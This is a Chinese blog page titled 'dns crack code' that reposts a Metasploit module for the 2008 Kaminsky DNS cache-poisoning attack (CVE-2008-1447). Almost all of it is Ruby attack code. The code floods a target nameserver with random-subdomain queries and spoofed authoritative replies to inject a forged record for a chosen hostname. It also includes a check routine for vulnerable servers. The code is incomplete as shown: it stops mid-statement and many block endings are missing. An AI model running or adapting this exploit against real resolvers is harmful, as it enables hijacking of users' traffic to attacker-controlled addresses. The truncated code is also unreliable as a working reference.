dns crack code

topinking

浏览: 848273 次
性别:
来自: 北京

最近访客更多访客>>

itskyblue

sos303sos

hxgdragon

1310002415

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

Socket .net Linux Cache UP

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288

require 'msf/core'

require 'net/dns'

require 'scruby'

require 'resolv'

module Msf

class Auxiliary::Spoof::Dns::BaliWickedHost < Msf::Auxiliary

include Exploit::Remote::Ip

def initialize(info = {})

super(update_info(info,

'Name' => 'DNS BaliWicked Attack',

'Description' => %q{

This exploit attacks a fairly ubiquitous flaw in DNS implementations which

Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single

malicious host entry into the target nameserver by sending random sub-domain

queries to the target DNS server coupled with spoofed replies to those

queries from the authoritative nameservers for the domain which contain a

malicious host entry for the hostname to be poisoned in the authority and

additional records sections. Eventually, a guessed ID will match and the

spoofed packet will get accepted, and due to the additional hostname entry

being within baliwick constraints of the original request the malicious host

entry will get cached.

'Author' => [ 'I)ruid', 'hdm' ],

'License' => MSF_LICENSE,

'Version' => '$Revision$',

'References' =>

[

[ 'CVE', '2008-1447' ],

[ 'US-CERT-VU', '8000113' ],

[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.html' ],

'Privileged' => true,

'Targets' =>

[

["BIND",

{

'Arch' => ARCH_X86,

'Platform' => 'linux',

'DisclosureDate' => 'Jul 21 2008'

))

register_options(

[

OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),

OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.doxpara.com']),

OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),

OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),

OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),

OptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),

], self.class)

end

def auxiliary_commands

return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }

end

def cmd_check(*args)

targ = args[0] || rhost()

if(not (targ and targ.length > 0))

print_status("usage: check [dns-server]")

return

end

print_status("Using the Metasploit service to verify exploitability...")

srv_sock = Rex::Socket.create_udp(

'PeerHost' => targ,

'PeerPort' => 53

)

random = false

ports = []

lport = nil

1.upto(5) do |i|

req = Resolv::DNS::Message.new

txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"

req.add_question(txt, Resolv::DNS::Resource::IN::TXT)

req.rd = 1

srv_sock.put(req.encode)

res, addr = srv_sock.recvfrom()

if res and res.length > 0

res = Resolv::DNS::Message.decode(res)

res.each_answer do |name, ttl, data|

if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)

t_addr, t_port = $1.split(':')

print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")

t_port = t_port.to_i

if(lport and lport != t_port)

random = true

end

lport = t_port

ports << t_port

end

srv_sock.close

if(ports.length < 5)

print_status("UNKNOWN: This server did not reply to our vulnerability check requests")

return

end

if(random)

print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")

print_status(" This server may still be exploitable, but not by this tool.")

else

print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")

end

def run

target = rhost()

source = Rex::Socket.source_address(target)

sport = datastore['SRCPORT']

hostname = datastore['HOSTNAME'] + '.'

address = datastore['NEWADDR']

recons = datastore['RECONS']

xids = datastore['XIDS'].to_i

ttl = datastore['TTL'].to_i

domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]

srv_sock = Rex::Socket.create_udp(

'PeerHost' => target,

'PeerPort' => 53

)

# Get the source port via the metasploit service if it's not set

if sport.to_i == 0

req = Resolv::DNS::Message.new

txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"

req.add_question(txt, Resolv::DNS::Resource::IN::TXT)

req.rd = 1

srv_sock.put(req.encode)

res, addr = srv_sock.recvfrom()

if res and res.length > 0

res = Resolv::DNS::Message.decode(res)

res.each_answer do |name, ttl, data|

if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)

t_addr, t_port = $1.split(':')

sport = t_port.to_i

print_status("Switching to target port #{sport} based on Metasploit service")

if target != t_addr

print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")

end

# Verify its not already cached

begin

query = Resolv::DNS::Message.new

query.add_question(hostname, Resolv::DNS::Resource::IN::A)

query.rd = 0

begin

cached = false

srv_sock.put(query.encode)

answer, addr = srv_sock.recvfrom()

if answer and answer.length > 0

answer = Resolv::DNS::Message.decode(answer)

answer.each_answer do |name, ttl, data|

if((name.to_s + ".") == hostname and data.address.to_s == address)

t = Time.now + ttl

print_status("Failure: This hostname is already in the target cache: #{name} == #{address}")

print_status(" Cache entry expires on #{t.to_s}... sleeping.")

cached = true

sleep ttl

end

end until not cached

rescue ::Interrupt

raise $!

rescue ::Exception => e

print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")

end

res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver

print_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"

# Look up the nameservers for the domain

print_status "Querying recon nameserver for #{domain}'s nameservers..."

answer0 = res0.send(domain, Net::DNS::NS)

#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"

barbs = [] # storage for nameservers

answer0.answer.each do |rr0|

print_status " Got an #{rr0.type} record: #{rr0.inspect}"

if rr0.type == 'NS'

print_status "Querying recon nameserver for address of #{rr0.nsdname}..."

answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname

#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"

answer1.answer.each do |rr1|

print_status " Got an #{rr1.type} record: #{rr1.inspect}"

res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)

print_status "Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."

answer2 = res2.send(domain)

if answer2 and answer2.header.auth? and answer2.header.anCount >= 1

nsrec = {:name => rr0.nsdname, :addr => rr1.address}

barbs << nsrec

print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"

end

if barbs.length == 0

print_status( "No DNS servers found.")

srv_sock.close

disconnect_ip

return

end

# Flood the target with queries and spoofed responses, one will eventually hit

queries = 0

responses = 0

connect_ip if not ip_sock

print_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")

while true

randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname

# Send spoofed query

req = Resolv::DNS::Message.new

req.id = rand(2**16)

req.add_question(randhost, Resolv::DNS::Resource::IN::A)

req.rd = 1

buff = (

Scruby::IP.new(

#:src => barbs[0][:addr].to_s,

:src => source,

:dst => target,

:proto => 17

)/Scruby::UDP.new(

:sport => (rand((2**16)-1024)+1024).to_i,

:dport => 53

)/req.encode

).to_net

ip_sock.sendto(buff, target)

queries += 1

# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])

req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))

req.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))

req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))

req.qr = 1

req.ra = 1

p = rand(4)+2*10000

p.upto(p+xids-1) do |id|

req.id = id

barbs.each do |barb|

buff = (

Scruby::IP.new(

#:src => barbs[i][:addr].to_s,

:src => barb[:addr].to_s,

:dst => target,

:proto => 17

)/Scruby::UDP.new(

:sport => 53,

:dport => sport.to_i

分享到：

IT人员招聘 | Windows下安装使用openldap

2008-08-02 14:54
浏览 1180
评论(0)
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

dns crack code

评论

发表评论

相关推荐

最近访客 更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

dns crack code

评论

发表评论

相关推荐

最近访客更多访客>>